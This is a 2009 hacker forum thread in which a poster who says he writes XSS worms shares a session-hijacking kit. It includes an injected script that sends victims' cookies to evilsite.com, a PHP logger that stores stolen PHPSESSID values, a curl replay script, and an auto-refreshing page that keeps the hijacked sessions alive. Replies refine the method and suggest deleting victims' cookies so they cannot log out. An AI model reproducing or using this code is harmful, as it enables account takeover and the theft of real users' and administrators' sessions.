Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Keeping sessions alive php script
Posted by: PaPPy
Date: July 15, 2009 02:14PM

everytime i write a worm, what typically happens is when i am asleep an admin or some power user visits it and their session dies by the time i see it in my cookie log. so i want to write a cookie logger that keeps the session alive.

i havent tested this in complete, but feel free to pick it apart

it comes in 3 files (yes this seems very insecure, but as you are the only one using it and the victims only see a blank white page of their details be sent to, its not that bad)

first file is what you include in your <script>document.write("<img src=http://evilsite.com/save.php?c=" + document.cookie + ">");</script>


it takes the user's cookie and searchs to see if the session is aready being kept alive, if not add it to the auto refreshing html file
save.php
<?php
function rstrstr($haystack, $needle) 
{ 
    return substr(strrev(strstr(strrev($haystack), strrev($needle))), 0, -strlen($needle)); 
}


$filename = "sessions.html";
$handle = fopen($filename, "a+");
$contents = fread($handle, filesize($filename));

//change these to something match the session value, or something that is unique to the session
$stringstart="PHPSESSID=";
$stringend=";";

$c = $_GET['c'];

$found = preg_match("/$stringstart(.*?)$stringend/", $c, $matches);

$uniquevalue = $matches[1];
//gives us the value of PHPSESSID 

//search thru the file and see it exists
$doesvalueexistinfile = rstrstr($contents, $uniquevalue);

if(empty($doesvalueexistinfile)){
//the session is not alive so lets add it to the text file
$cc = urlencode($c);
$text = "<iframe src=\"curl.php?c=$cc\" width=100 height=100 frameborder=0></iframe>\n";
fwrite($fp, $text);
}

fclose($handle);
?>

next is a simple curl script that takes the cookie variables and uses them to fetch a page, this page is launched from the iframes
curl.php
<?php

$c = curl_init('http://site.com/news.php');
$vars = urldecode($_GET['c']);

curl_setopt ($c, CURLOPT_COOKIE, $vars);
curl_setopt ($c, CURLOPT_RETURNTRANSFER, true);
$page = curl_exec ($c);
curl_close ($c);

echo $page; //remove to speed things up
?>

and last is the page you leave open on your browser, that keeps refreshing the iframes of the curl.php page

sessions.html
<html>
<head>
<script language="JavaScript">
function startTimer() {
setInterval(onTick,60000); // every minute change as you see fit
}
function onTick() {
document.location.reload();
}
</script>
</head>
<body onLoad="startTimer();">
<iframe src="curl.php?c=PHPSESSID%3Da245345345345%3B%20name%3DEXAMPLE%3B" width=100 height=100 frameborder=0></iframe>

im sure there is problably an easier way to do this, but this is the best i came up with while on the shitter

and improvements feel free to add, thanks

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: Keeping sessions alive php script
Posted by: tx
Date: July 15, 2009 08:05PM

It seems most likely to me that the sessions are expired because the user is logging out. Refreshing an iframe in that case seems both useless and noisy. In cases where the sessions is expiring 'naturally' (ie. not because of any user action) wouldn't it be better to bypass the iframe and instead just use a small php script and tie it to a cronjob so that it regularly parses your list of sessions and makes a request including the relevant cookies to the server?

Admittedly, this approach would fail for any application that ties session id to ip address (etc.), but then again, the session id isn't really valuable in that case anyway.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 07/15/2009 08:07PM by tx.

Options: ReplyQuote
Re: Keeping sessions alive php script
Posted by: PaPPy
Date: July 15, 2009 10:48PM

the server i use cant handle crons
and the sites im typically worming dont have IP address checks or any session hijacking protection

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: Keeping sessions alive php script
Posted by: kuza55
Date: July 16, 2009 08:17AM

tx Wrote:
-------------------------------------------------------
> It seems most likely to me that the sessions are
> expired because the user is logging out.

If you're not particularly worried about stealth, just delete the cookies from the user's browser so that they can't log the session out.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Options: ReplyQuote


Sorry, only registered users may post in this forum.